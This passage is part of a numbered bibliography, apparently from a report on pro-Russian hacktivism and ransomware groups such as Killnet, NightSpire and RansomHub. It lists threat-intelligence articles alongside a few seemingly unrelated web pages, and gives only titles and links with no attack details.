  46. Killnet: Analysis of Attacks from a Prominent Pro-Russian Hacktivist Group – Forescout, accessed April 21, 2025, https://www.forescout.com/blog/killnet-analysis-of-attacks-from-a-prominent-pro-russian-hacktivist-group/
  47. Assemblea SIT-ER 2019 – WordPress, accessed April 21, 2025, https://www.sit-er.it/2019/10/26/assemblea-sit-er-2019/
  48. Buy Web Hosting in Kent, United Kingdom – GlobexCamHost, accessed April 21, 2025, https://www.globexcamhost.com/en/webhosting/buy-standard-web-hosting-in-kent-england-united_kingdom
  49. WordPress Resources at SiteGround – Studio Psicologia Martinengo, accessed April 21, 2025, https://studiopsicologiamartinengo.it/wordpress-resources-at-siteground/
  50. Explore.org- Rising up in Palm Springs, accessed April 21, 2025, https://blog.explore.org/explore-org-rising-up-in-palm-springs/
  51. The Purge: Anarchy Review – Next Projection, accessed April 21, 2025, https://nextprojection.com/2014/07/18/purge-anarchy-review/
  52. COMMERCE (MODEL KEPERCAYAAN UNTUK E-DAGANG BERASASKAN PERSEPSI PENGGUNA) No Vot 78196 – Eprint UTM, accessed April 21, 2025, http://eprints.utm.my/9788/1/78196.pdf
  53. Anonymous (hacker group) – Wikipedia, accessed April 21, 2025, https://en.wikipedia.org/wiki/Anonymous_(hacker_group)
  54. Modern Approach to Attributing Hacktivist Groups – Check Point Research, accessed April 21, 2025, https://research.checkpoint.com/2025/modern-approach-to-attributing-hacktivist-groups/
  55. What is Hacktivism | Types, Ethics, History & Examples – Imperva, accessed April 21, 2025, https://www.imperva.com/learn/application-security/hacktivism/
  56. NEWS IN BRIEF – UKRAINE CONFLICT – BATTLESPACE Updates, accessed April 21, 2025, https://battle-updates.com/update/news-in-brief-ukraine-conflict-47/
  57. Pro-Russian Hacktivist Group Claims 6600 Attacks Targeting Europe, accessed April 21, 2025, https://www.infosecurity-magazine.com/news/pro-russian-hacktivist-attacks/
  58. Ransomware in focus: Meet NightSpire – S-RM, accessed April 21, 2025, https://www.s-rminform.com/latest-thinking/ransomware-in-focus-meet-nightspire
  59. Threat Intelligence Report Mar 25th – Mar 31st, 2025 – Red Piranha, accessed April 21, 2025, https://redpiranha.net/news/threat-intelligence-report-march-25-march-31-2025
  60. Ransomware Report 2023: targets, motives, and trends – Outpost24, accessed April 21, 2025, https://outpost24.com/blog/ransomware-report-2023-targets-motives-and-trends/
  61. TRACKING RANSOMWARE – MARCH 2025 – CYFIRMA, accessed April 21, 2025, https://www.cyfirma.com/research/tracking-ransomware-march-2025
  62. The rising tide: A 2024 retrospective of hacktivism – Silobreaker, accessed April 21, 2025, https://www.silobreaker.com/blog/hacktivism-ransomware-and-geopolitics-2024-in-review/
  63. A Tempest at RansomHub: Major new cyber threat group expands – S-RM, accessed April 21, 2025, https://www.s-rminform.com/latest-thinking/a-tempest-at-ransomhub-major-new-cyber-threat-group-expands